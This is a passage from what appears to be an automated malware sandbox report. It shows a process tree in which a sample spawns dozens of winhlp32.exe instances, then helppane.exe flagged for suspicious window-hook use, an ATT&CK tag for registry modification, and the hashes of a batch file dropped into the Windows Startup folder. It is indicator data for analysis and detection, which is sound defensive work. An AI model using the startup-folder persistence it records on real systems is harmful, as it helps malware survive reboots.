  PID:7668
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:7680
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:7736
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:7756
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:7776
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:7792
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:7808
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:7820
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:7868
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:7884
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:7900
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:7928
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:8468
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:8544
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:8556
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:8576
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:8584
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:8688
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:9088
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:9096
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:9112
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:9124
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:9144
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:9156
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:9168
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:9204
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:9240
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:9256
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:9268
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:9280
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:9512
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:9576
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:9628
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:10080
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:10096
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:10500
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:10508
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:10532
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:10540
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:10576
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:10608
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:10632
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:10804
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:10856
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:10896
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:10912
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:10996
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:11020
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:11092
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:11120
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:11132
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:11148
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:11196
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:11216
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:11224
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:11244
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:11252
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:10248
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:10244
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:10480
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:11272
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:11280
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:11296
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:11308
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:11320
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:11376
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:11396
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:11408
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:11540
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:11592
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:11832
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:11872
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:11884
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:11896
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:11920
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:12404
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:13876
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:13960
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:13976
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:13996
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:14036
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:14048
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:14064
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:14072
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:14108
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:14120
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:14192
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:14216
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:14380
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:15504
- C:\Windows\winhlp32.exe
  winhlp32
  2⤵
  PID:17260

C:\Windows\helppane.exe
C:\Windows\helppane.exe -Embedding
1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4836

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 440 -p 4836 -ip 4836
1⤵
PID:4252

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Windows64Driver.bat

Filesize
1KB

MD5
ff97f2b440aa3979458c1745b43f2a2a

SHA1
9748911e288e3992a4b5e17c760c2a606ec1d9d3

SHA256
593b64d3729ad55c2c6dd7ebb81903505b65f6ea087bdce3c0dfe94179710d33

SHA512
f4d164e206b1afe70e5de675646884bacecd8f9058be032ef6cb2ab198807f8c5a51f243fae77255a5912cf781cf3182a8d73ffcb98b9e1b8a60661b22ee4804

Download Submit